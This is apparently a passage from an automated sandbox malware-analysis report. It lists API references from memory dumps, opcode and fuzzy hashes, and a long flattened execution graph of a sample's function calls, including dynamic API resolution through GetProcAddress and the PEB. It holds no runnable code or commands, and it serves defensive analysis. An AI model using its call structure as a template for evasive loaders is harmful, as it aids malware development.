                                                                            APIs
                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0674A71D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6740000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost
                                                                            • String ID:
                                                                            • API String ID: 410705778-0
                                                                            • Opcode ID: 1e1d22fd91ee0eceebab4c66d406ea06ebdab66a7456935ddf4a4dcd17939b18
                                                                            • Instruction ID: d41c3eca716f5be0d9865545abe47eb9b11025cefb3a1255c3488caacc780a60
                                                                            • Opcode Fuzzy Hash: 1e1d22fd91ee0eceebab4c66d406ea06ebdab66a7456935ddf4a4dcd17939b18
                                                                            • Instruction Fuzzy Hash: FF1103B5800349DFDB20DF9AC889BDEBBF8EB48320F10841AE519A7240D375A944CFA5
                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0246AF5E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1891083418.0000000002460000.00000040.00000800.00020000.00000000.sdmp, Offset: 02460000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2460000_file.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: 771d7aca7cc2bf6b73d089ce96bdadef84b06d713956110cbe03bb072758a94e
                                                                            • Instruction ID: e1986f02740e4a75058cbe0665426fba38aaee28484b3ef875c6083892ed9d62
                                                                            • Opcode Fuzzy Hash: 771d7aca7cc2bf6b73d089ce96bdadef84b06d713956110cbe03bb072758a94e
                                                                            • Instruction Fuzzy Hash: 4D110FB6C007498FCB14CF9AC848A9EFBF4EB88224F10845AD419B7200C379A545CFA6
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6740000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ResumeThread
                                                                            • String ID:
                                                                            • API String ID: 947044025-0
                                                                            • Opcode ID: 904fec8fa9771bda75bdc6c72d2dfffada09790d4eb2551bd74e8ba2b32c3a9f
                                                                            • Instruction ID: 45847e01a14d33a8cb5bac5d3277064d5dbc779f356d1619320c34f1fd2fbe0b
                                                                            • Opcode Fuzzy Hash: 904fec8fa9771bda75bdc6c72d2dfffada09790d4eb2551bd74e8ba2b32c3a9f
                                                                            • Instruction Fuzzy Hash: C91166B19043498FCB10DFA9C4457EEFFF1AF88314F24885EC159A7240CB349944CB95
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1890602136.000000000232D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0232D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_232d000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9282b83a30a6d2220a05e699973470a62ff65720c1d119ca8049f92a7b0bd30f
                                                                            • Instruction ID: bb9ab18e4e762f35356a994b5aae5b61a74377451884c5c7e997d431079641b9
                                                                            • Opcode Fuzzy Hash: 9282b83a30a6d2220a05e699973470a62ff65720c1d119ca8049f92a7b0bd30f
                                                                            • Instruction Fuzzy Hash: 72213A71604248DFDB05DF14D9C0B26BFA9FB94318F34C569E80A0B656C376D45AC7A1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1890652749.000000000233D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0233D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_233d000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ed315b5e418e23dda69ef05c5a25be6eca70689b8174a3d1e5233dd4fa918c0f
                                                                            • Instruction ID: 52b4e270d6fc093626270aa7f38148f06dbd7c393c9b4ca0f5e675fe728f9e06
                                                                            • Opcode Fuzzy Hash: ed315b5e418e23dda69ef05c5a25be6eca70689b8174a3d1e5233dd4fa918c0f
                                                                            • Instruction Fuzzy Hash: DB213B71614308EFDB06DF14D9C4B25BBA5FB84314F24C66DE80A8B352C736D516CB61
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1890652749.000000000233D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0233D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_233d000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: be0390fdb0d35cd122023574c88af1da2dcb14bfe9c3f249186d7a78a966d0ef
                                                                            • Instruction ID: e4d0628694f87dd6552b56a9782a50baf0cfbd2a9170ad507a46827c2b6dd093
                                                                            • Opcode Fuzzy Hash: be0390fdb0d35cd122023574c88af1da2dcb14bfe9c3f249186d7a78a966d0ef
                                                                            • Instruction Fuzzy Hash: 4C2125B1604208DFDB16DF14D8C4B16BBA5FB84714F20C56DD80A0B356C336D507CB61
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1890652749.000000000233D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0233D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_233d000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 55fc290fe076130ed8c35fa0d2ee729fa19789dee46c5f3b0116d9049257b756
                                                                            • Instruction ID: a63628ea9df8a5df6f5124cc4bf6b28e4a499e4381a0f88aca87c996bf7afe0f
                                                                            • Opcode Fuzzy Hash: 55fc290fe076130ed8c35fa0d2ee729fa19789dee46c5f3b0116d9049257b756
                                                                            • Instruction Fuzzy Hash: F12150755083849FCB03CF24D994B11BF71EB46614F28C5DAD8498F2A7C33A995ACB62
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1890602136.000000000232D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0232D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_232d000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                            • Instruction ID: ea258eb097d6c4ea621efb122339e23e259c508c48a77e5a466445d32928d2a7
                                                                            • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                            • Instruction Fuzzy Hash: 9711E676504284CFDB16CF14D5C4B16BF72FB84328F34C6A9D8494B656C336D45ACBA1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1890652749.000000000233D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0233D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_233d000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                            • Instruction ID: 72637bc83f5ee547067ab1020168ddcd24a86fe4d0bb810d5f63ce88278976ed
                                                                            • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                            • Instruction Fuzzy Hash: 1911DD75904284DFCB02CF10C5C4B15FBB2FB84324F24C6ADD8498B296C33AD50ACB61
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6740000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: z|>
                                                                            • API String ID: 0-1134487427
                                                                            • Opcode ID: d9a26365c41f034c58eb4c7251dc471a049f7fb1827ee2bd6f82cf815dec615a
                                                                            • Instruction ID: 6ce01e3166fe49b6670c94953a24e79ed74a98e64f05e190e47c84da90a8d71b
                                                                            • Opcode Fuzzy Hash: d9a26365c41f034c58eb4c7251dc471a049f7fb1827ee2bd6f82cf815dec615a
                                                                            • Instruction Fuzzy Hash: 62E1F9B4E101198FCB54DFA9C5849AEFBF2FF89304F248169D814AB35AD731A941CFA1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6740000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Y>0
                                                                            • API String ID: 0-1250427286
                                                                            • Opcode ID: 8139ead8b6baae195b443f6613f284dbb1465a76e0f461749568fac447e931cd
                                                                            • Instruction ID: ffa99639a815a07d1bfe5b5d8950b9ea02e7df3de2659cc47d8cc88013261183
                                                                            • Opcode Fuzzy Hash: 8139ead8b6baae195b443f6613f284dbb1465a76e0f461749568fac447e931cd
                                                                            • Instruction Fuzzy Hash: 7DE1FBB4E101198FDB14DFA9C5949AEFBF2FF89304F248169D414AB35ADB31A941CF60
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6740000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: fo_N
                                                                            • API String ID: 0-3502626514
                                                                            • Opcode ID: 4a798d02df77ce26c84871779e9fadd2a004c9f4f2395298788fb6a4e817c023
                                                                            • Instruction ID: ad571c0399a0f2ce99774d1cfa2a2dd9adc602cbf07f39515a63fcaaa54632a3
                                                                            • Opcode Fuzzy Hash: 4a798d02df77ce26c84871779e9fadd2a004c9f4f2395298788fb6a4e817c023
                                                                            • Instruction Fuzzy Hash: F8E1FAB4E101199FDB14DFA9C5849AEFBF2FF89304F248169D414AB35ADB30A941CFA1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1897178840.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_4b10000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 030d89efe3ac9505ba3e3ac6992e4a78f28003607d4ae6c2f162238a10506e39
                                                                            • Instruction ID: ee4f5b28dcf1265614f811c16c930e2db71632ffe742fdcdb7e1135e5b443a2c
                                                                            • Opcode Fuzzy Hash: 030d89efe3ac9505ba3e3ac6992e4a78f28003607d4ae6c2f162238a10506e39
                                                                            • Instruction Fuzzy Hash: A712C7B0CA17458BE318CF25EC4C18D3BF1BB81314BD28A0DCA616B2E5EBB4156ACF44
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6740000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: debe6411c356324331fdf1af956b4f88103e20b6e4800d728345cdd9658c66e1
                                                                            • Instruction ID: 583246b72799e5550ba2ec7e8f55eb744cdd28234f40afec369b4eb402005ebd
                                                                            • Opcode Fuzzy Hash: debe6411c356324331fdf1af956b4f88103e20b6e4800d728345cdd9658c66e1
                                                                            • Instruction Fuzzy Hash: B7E10C74E101198FDB14DFA9C5849AEFBF2FF89304F248169D415AB35ADB31A941CF60
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6740000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e7cb2e70f6241312c3db23392138be1e0c6ca7150ddebde671484f6fa499e388
                                                                            • Instruction ID: 144bbc290e01b7abbba4773574f813eb45a84d3e2fe3c47968a660b0a10c83aa
                                                                            • Opcode Fuzzy Hash: e7cb2e70f6241312c3db23392138be1e0c6ca7150ddebde671484f6fa499e388
                                                                            • Instruction Fuzzy Hash: C9E109B4E101198FDB14DFA9C5849AEFBF2FF89305F248169D414AB35AD730A981CFA1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1891083418.0000000002460000.00000040.00000800.00020000.00000000.sdmp, Offset: 02460000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2460000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 216f9242cd788bd260b65df39b48b257d86d3bd1340aa8830cb7798c8dc19885
                                                                            • Instruction ID: 49c338b3be44019ecbba5b29638526679d85de7df60bc7d29ba98f4594fa4484
                                                                            • Opcode Fuzzy Hash: 216f9242cd788bd260b65df39b48b257d86d3bd1340aa8830cb7798c8dc19885
                                                                            • Instruction Fuzzy Hash: 7BA17E32E102098FCF15DFA5D8445EEB7B2FF85304B16856AE802AB661DB31ED5ACF40
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1897178840.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_4b10000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6dacd2751bd68b2fc6c0c55021e3a6454955c003b495eaae4e98baeae62529ec
                                                                            • Instruction ID: 989097ceb30bfa10998c7e8c3c2c194da129504cf901519aef2ecf8e76de0043
                                                                            • Opcode Fuzzy Hash: 6dacd2751bd68b2fc6c0c55021e3a6454955c003b495eaae4e98baeae62529ec
                                                                            • Instruction Fuzzy Hash: F7C12AB0CA17468FD719CF25EC4C18D7BB1BB81324B928A0DD6616B2E5EBB4146ACF44

                                                                            Execution Graph

                                                                            Execution Coverage:31.3%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:4.4%
                                                                            Total number of Nodes:1846
                                                                            Total number of Limit Nodes:94
                                                                            execution_graph 9703 40c640 9730 404bee 9703->9730 9706 40c70f 9707 404bee 6 API calls 9708 40c66b 9707->9708 9709 404bee 6 API calls 9708->9709 9715 40c708 9708->9715 9712 40c683 9709->9712 9710 402bab 2 API calls 9710->9706 9711 40c701 9714 402bab 2 API calls 9711->9714 9712->9711 9713 404bee 6 API calls 9712->9713 9718 40c694 9713->9718 9714->9715 9715->9710 9716 40c6f8 9717 402bab 2 API calls 9716->9717 9717->9711 9718->9716 9737 40c522 9718->9737 9720 40c6a9 9721 40c6ef 9720->9721 9723 405872 4 API calls 9720->9723 9722 402bab 2 API calls 9721->9722 9722->9716 9724 40c6c5 9723->9724 9725 405872 4 API calls 9724->9725 9726 40c6d5 9725->9726 9727 405872 4 API calls 9726->9727 9728 40c6e7 9727->9728 9729 402bab 2 API calls 9728->9729 9729->9721 9731 402b7c 2 API calls 9730->9731 9732 404bff 9731->9732 9733 404c3b 9732->9733 9734 4031e5 4 API calls 9732->9734 9733->9706 9733->9707 9735 404c28 9734->9735 9735->9733 9736 402bab 2 API calls 9735->9736 9736->9733 9738 402b7c 2 API calls 9737->9738 9739 40c542 9738->9739 9739->9720 9740 405941 9741 4031e5 4 API calls 9740->9741 9742 405954 9741->9742 8307 409046 8320 413b28 8307->8320 8309 40906d 8311 405b6f 6 API calls 8309->8311 8310 40904e 8310->8309 8312 403fbf 7 API calls 8310->8312 8313 40907c 8311->8313 8312->8309 8314 409092 8313->8314 8324 409408 8313->8324 8316 4090a3 8314->8316 8319 402bab 2 API calls 8314->8319 8318 402bab 2 API calls 8318->8314 8319->8316 8321 413b31 8320->8321 8322 413b38 8320->8322 8323 404056 6 API calls 8321->8323 8322->8310 8323->8322 8325 409413 8324->8325 8326 40908c 8325->8326 8338 409d36 8325->8338 8326->8318 8337 40945c 8444 40a35d 8337->8444 8339 409d43 8338->8339 8340 40a35d 4 API calls 8339->8340 8341 409d55 8340->8341 8342 4031e5 4 API calls 8341->8342 8343 409d8b 8342->8343 8344 4031e5 4 API calls 8343->8344 8345 409dd0 8344->8345 8346 405b6f 6 API calls 8345->8346 8377 409423 8345->8377 8349 409df7 8346->8349 8347 409e1c 8348 4031e5 4 API calls 8347->8348 8347->8377 8350 409e62 8348->8350 8349->8347 8351 402bab 2 API calls 8349->8351 8352 4031e5 4 API calls 8350->8352 8351->8347 8353 409e82 8352->8353 8354 4031e5 4 API calls 8353->8354 8355 409ea2 8354->8355 8356 4031e5 4 API calls 8355->8356 8357 409ec2 8356->8357 8358 4031e5 4 API calls 8357->8358 8359 409ee2 8358->8359 8360 4031e5 4 API calls 8359->8360 8361 409f02 8360->8361 8362 4031e5 4 API calls 8361->8362 8363 409f22 8362->8363 8364 4031e5 4 API calls 8363->8364 8367 409f42 8364->8367 8365 40a19b 8366 408b2c 4 API calls 8365->8366 8366->8377 8367->8365 8368 409fa3 8367->8368 8369 405b6f 6 API calls 8368->8369 8368->8377 8370 409fbd 8369->8370 8371 40a02c 8370->8371 8372 402bab 2 API calls 8370->8372 8373 4031e5 4 API calls 8371->8373 8399 40a16d 8371->8399 8375 409fd7 8372->8375 8376 40a070 8373->8376 8374 402bab 2 API calls 8374->8377 8378 405b6f 6 API calls 8375->8378 8379 4031e5 4 API calls 8376->8379 8377->8337 8400 4056bf 8377->8400 8381 409fe5 8378->8381 8380 40a090 8379->8380 8382 4031e5 4 API calls 8380->8382 8381->8371 8383 402bab 2 API calls 8381->8383 8384 40a0b0 8382->8384 8385 409fff 8383->8385 8388 4031e5 4 API calls 8384->8388 8386 405b6f 6 API calls 8385->8386 8387 40a00d 8386->8387 8387->8371 8390 40a021 8387->8390 8389 40a0d0 8388->8389 8392 4031e5 4 API calls 8389->8392 8391 402bab 2 API calls 8390->8391 8391->8377 8393 40a0f0 8392->8393 8394 4031e5 4 API calls 8393->8394 8396 40a110 8394->8396 8395 40a134 8395->8399 8454 408b2c 8395->8454 8396->8395 8397 4031e5 4 API calls 8396->8397 8397->8395 8399->8374 8399->8377 8401 402b7c 2 API calls 8400->8401 8402 4056cd 8401->8402 8403 4056d4 8402->8403 8404 402b7c 2 API calls 8402->8404 8405 408c4d 8403->8405 8404->8403 8406 413ba4 6 API calls 8405->8406 8407 408c5c 8406->8407 8408 408f02 8407->8408 8409 408f3a 8407->8409 8412 40903e 8407->8412 8411 405b6f 6 API calls 8408->8411 8410 405b6f 6 API calls 8409->8410 8426 408f51 8410->8426 8413 408f0c 8411->8413 8428 413aca 8412->8428 8413->8412 8417 408f31 8413->8417 8457 40a1b6 8413->8457 8415 405b6f 6 API calls 8415->8426 8416 402bab 2 API calls 8416->8412 8417->8416 8419 409031 8420 402bab 2 API calls 8419->8420 8420->8417 8421 409022 8422 402bab 2 API calls 8421->8422 8423 409028 8422->8423 8424 402bab 2 API calls 8423->8424 8424->8417 8425 402bab GetProcessHeap HeapFree 8425->8426 8426->8412 8426->8415 8426->8417 8426->8419 8426->8421 8426->8425 8427 40a1b6 14 API calls 8426->8427 8491 4044ee 8426->8491 8427->8426 8429 409451 8428->8429 8430 413ad7 8428->8430 8438 405695 8429->8438 8431 405781 4 API calls 8430->8431 8432 413af0 8431->8432 8433 405781 4 API calls 8432->8433 8434 413afe 8433->8434 8435 405762 4 API calls 8434->8435 8436 413b0e 8435->8436 8436->8429 8437 405781 4 API calls 8436->8437 8437->8429 8439 4056a0 8438->8439 8440 4056b9 8438->8440 8441 402bab 2 API calls 8439->8441 8440->8337 8442 4056b3 8441->8442 8443 402bab 2 API calls 8442->8443 8443->8440 8445 40a39a 8444->8445 8446 40a368 8444->8446 8447 4031e5 4 API calls 8445->8447 8449 40a3af 8445->8449 8450 4031e5 4 API calls 8446->8450 8447->8449 8448 40a3ca 8452 40a38a 8448->8452 8453 408b2c 4 API calls 8448->8453 8449->8448 8451 408b2c 4 API calls 8449->8451 8450->8452 8451->8448 8452->8326 8453->8452 8455 4031e5 4 API calls 8454->8455 8456 408b3e 8455->8456 8456->8399 8458 40a202 8457->8458 8459 40a1c3 8457->8459 8613 405f08 8458->8613 8460 405b6f 6 API calls 8459->8460 8463 40a1d0 8460->8463 8462 40a1fc 8462->8417 8463->8462 8466 40a1f3 8463->8466 8501 40a45b 8463->8501 8465 40a333 8467 402bab 2 API calls 8465->8467 8469 402bab 2 API calls 8466->8469 8467->8462 8469->8462 8470 405b6f 6 API calls 8472 40a245 8470->8472 8471 40a25d 8473 405b6f 6 API calls 8471->8473 8472->8471 8474 413a58 13 API calls 8472->8474 8479 40a26b 8473->8479 8475 40a257 8474->8475 8478 402bab 2 API calls 8475->8478 8476 40a28b 8477 405b6f 6 API calls 8476->8477 8484 40a297 8477->8484 8478->8471 8479->8476 8480 40a284 8479->8480 8620 40955b 8479->8620 8482 402bab 2 API calls 8480->8482 8482->8476 8483 405b6f 6 API calls 8488 40a2b7 8483->8488 8485 40a2b0 8484->8485 8484->8488 8627 40968e 8484->8627 8486 402bab 2 API calls 8485->8486 8486->8488 8488->8465 8488->8483 8490 402bab 2 API calls 8488->8490 8637 4098a7 8488->8637 8490->8488 8492 402b7c 2 API calls 8491->8492 8493 404512 8492->8493 8495 404585 GetLastError 8493->8495 8496 402bab 2 API calls 8493->8496 8499 40457c 8493->8499 8500 402b7c 2 API calls 8493->8500 8892 4044a7 8493->8892 8497 404592 8495->8497 8495->8499 8496->8493 8498 402bab 2 API calls 8497->8498 8498->8499 8499->8426 8500->8493 8646 40642c 8501->8646 8503 40a469 8504 40c4ff 8503->8504 8649 4047e6 8503->8649 8504->8466 8507 4040bb 12 API calls 8508 40bf88 8507->8508 8508->8504 8509 403c90 8 API calls 8508->8509 8510 40bfaa 8509->8510 8511 402b7c 2 API calls 8510->8511 8513 40bfc1 8511->8513 8512 40c4f3 8514 403f9e 5 API calls 8512->8514 8515 40c3aa 8513->8515 8656 40a423 8513->8656 8514->8504 8515->8512 8518 4056bf 2 API calls 8515->8518 8521 40c4e3 8515->8521 8516 402bab 2 API calls 8516->8512 8520 40c3d2 8518->8520 8520->8521 8523 4040bb 12 API calls 8520->8523 8521->8516 8522 405f08 4 API calls 8524 40c005 8522->8524 8525 40c3f3 8523->8525 8526 40c021 8524->8526 8659 40a43f 8524->8659 8528 40c4d1 8525->8528 8716 405a52 8525->8716 8527 4031e5 4 API calls 8526->8527 8530 40c034 8527->8530 8533 413aca 4 API calls 8528->8533 8539 4031e5 4 API calls 8530->8539 8534 40c4dd 8533->8534 8537 405695 2 API calls 8534->8537 8535 40c411 8721 405a87 8535->8721 8536 402bab 2 API calls 8536->8526 8537->8521 8545 40c04d 8539->8545 8540 40c4b3 8541 402bab 2 API calls 8540->8541 8543 40c4cb 8541->8543 8542 405a52 4 API calls 8553 40c423 8542->8553 8544 403f9e 5 API calls 8543->8544 8544->8528 8547 4031e5 4 API calls 8545->8547 8546 405a87 4 API calls 8546->8553 8548 40c085 8547->8548 8550 4031e5 4 API calls 8548->8550 8549 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8549->8553 8551 40c09c 8550->8551 8554 4031e5 4 API calls 8551->8554 8552 402bab 2 API calls 8552->8553 8553->8540 8553->8542 8553->8546 8553->8549 8553->8552 8555 40c0b3 8554->8555 8556 4031e5 4 API calls 8555->8556 8557 40c0ca 8556->8557 8558 4031e5 4 API calls 8557->8558 8559 40c0e7 8558->8559 8560 4031e5 4 API calls 8559->8560 8561 40c100 8560->8561 8562 4031e5 4 API calls 8561->8562 8563 40c119 8562->8563 8564 4031e5 4 API calls 8563->8564 8565 40c132 8564->8565 8566 4031e5 4 API calls 8565->8566 8567 40c14b 8566->8567 8568 4031e5 4 API calls 8567->8568 8569 40c164 8568->8569 8570 4031e5 4 API calls 8569->8570 8571 40c17d 8570->8571 8572 4031e5 4 API calls 8571->8572 8573 40c196 8572->8573 8574 4031e5 4 API calls 8573->8574 8575 40c1af 8574->8575 8576 4031e5 4 API calls 8575->8576 8577 40c1c8 8576->8577 8578 4031e5 4 API calls 8577->8578 8579 40c1de 8578->8579 8580 4031e5 4 API calls 8579->8580 8581 40c1f4 8580->8581 8582 4031e5 4 API calls 8581->8582 8583 40c20d 8582->8583 8584 4031e5 4 API calls 8583->8584 8585 40c226 8584->8585 8586 4031e5 4 API calls 8585->8586 8587 40c23f 8586->8587 8588 4031e5 4 API calls 8587->8588 8589 40c258 8588->8589 8590 4031e5 4 API calls 8589->8590 8591 40c273 8590->8591 8592 4031e5 4 API calls 8591->8592 8593 40c28a 8592->8593 8594 4031e5 4 API calls 8593->8594 8597 40c2d5 8594->8597 8595 40c3a2 8596 402bab 2 API calls 8595->8596 8596->8515 8597->8595 8598 4031e5 4 API calls 8597->8598 8599 40c315 8598->8599 8600 40c38b 8599->8600 8662 404866 8599->8662 8601 403c40 5 API calls 8600->8601 8603 40c397 8601->8603 8605 403c40 5 API calls 8603->8605 8605->8595 8606 40c382 8608 403c40 5 API calls 8606->8608 8608->8600 8610 406c4c 6 API calls 8611 40c355 8610->8611 8611->8606 8686 4126a7 8611->8686 8614 4031e5 4 API calls 8613->8614 8615 405f1d 8614->8615 8616 405f55 8615->8616 8617 402b7c 2 API calls 8615->8617 8616->8462 8616->8465 8616->8470 8616->8471 8618 405f36 8617->8618 8618->8616 8619 4031e5 4 API calls 8618->8619 8619->8616 8621 409673 8620->8621 8626 40956d 8620->8626 8621->8480 8622 408b45 6 API calls 8622->8626 8623 4059d8 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 8623->8626 8624 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8624->8626 8625 402bab GetProcessHeap HeapFree 8625->8626 8626->8621 8626->8622 8626->8623 8626->8624 8626->8625 8628 4040bb 12 API calls 8627->8628 8636 4096a9 8628->8636 8629 40989f 8629->8485 8630 409896 8631 403f9e 5 API calls 8630->8631 8631->8629 8633 408b45 6 API calls 8633->8636 8634 402bab GetProcessHeap HeapFree 8634->8636 8635 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8635->8636 8636->8629 8636->8630 8636->8633 8636->8634 8636->8635 8885 4059d8 8636->8885 8638 4040bb 12 API calls 8637->8638 8644 4098c1 8638->8644 8639 4099fb 8639->8488 8640 4099f3 8641 403f9e 5 API calls 8640->8641 8641->8639 8642 4059d8 4 API calls 8642->8644 8643 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8643->8644 8644->8639 8644->8640 8644->8642 8644->8643 8645 402bab GetProcessHeap HeapFree 8644->8645 8645->8644 8647 4031e5 4 API calls 8646->8647 8648 406441 GetNativeSystemInfo 8647->8648 8648->8503 8650 4031e5 4 API calls 8649->8650 8654 40480a 8650->8654 8651 40485d 8651->8504 8651->8507 8652 4031e5 4 API calls 8652->8654 8653 40484f 8655 403c40 5 API calls 8653->8655 8654->8651 8654->8652 8654->8653 8655->8651 8657 4031e5 4 API calls 8656->8657 8658 40a435 8657->8658 8658->8522 8660 4031e5 4 API calls 8659->8660 8661 40a451 8660->8661 8661->8536 8663 4031e5 4 API calls 8662->8663 8664 40487c 8663->8664 8664->8606 8665 406c4c 8664->8665 8726 4068eb 8665->8726 8667 406e02 8667->8610 8668 406cab 8738 40469b 8668->8738 8669 406c6c 8669->8667 8669->8668 8735 406894 8669->8735 8676 406df1 8677 40469b 4 API calls 8676->8677 8677->8667 8678 406cef 8678->8676 8679 4031e5 4 API calls 8678->8679 8680 406d26 8679->8680 8680->8676 8681 40771e 6 API calls 8680->8681 8685 406d57 8681->8685 8682 406da2 8683 4031e5 4 API calls 8682->8683 8683->8676 8685->8682 8751 4068b0 8685->8751 8687 4126bb 8686->8687 8688 4126d1 8686->8688 8689 412840 8687->8689 8807 40488c 8687->8807 8688->8689 8813 407055 8688->8813 8689->8606 8693 412837 8695 403c40 5 API calls 8693->8695 8695->8689 8697 41281e 8698 4070ff 6 API calls 8697->8698 8698->8693 8699 407055 6 API calls 8700 412742 8699->8700 8700->8697 8701 40719a 6 API calls 8700->8701 8702 41276e 8701->8702 8703 412804 8702->8703 8829 406f4a 8702->8829 8857 4070ff 8703->8857 8706 41279a 8835 412553 8706->8835 8879 405907 8716->8879 8718 405a61 8719 405a76 8718->8719 8720 405907 4 API calls 8718->8720 8719->8535 8720->8718 8722 402b7c 2 API calls 8721->8722 8724 405a99 8722->8724 8725 405ade 8724->8725 8882 40595e 8724->8882 8725->8553 8754 4076a8 8726->8754 8728 406913 8729 406a61 8728->8729 8730 40771e 6 API calls 8728->8730 8729->8669 8734 406949 8730->8734 8731 40771e 6 API calls 8731->8734 8732 404678 4 API calls 8732->8734 8734->8729 8734->8731 8734->8732 8760 4046c2 8734->8760 8736 4031e5 4 API calls 8735->8736 8737 4068a6 8736->8737 8737->8669 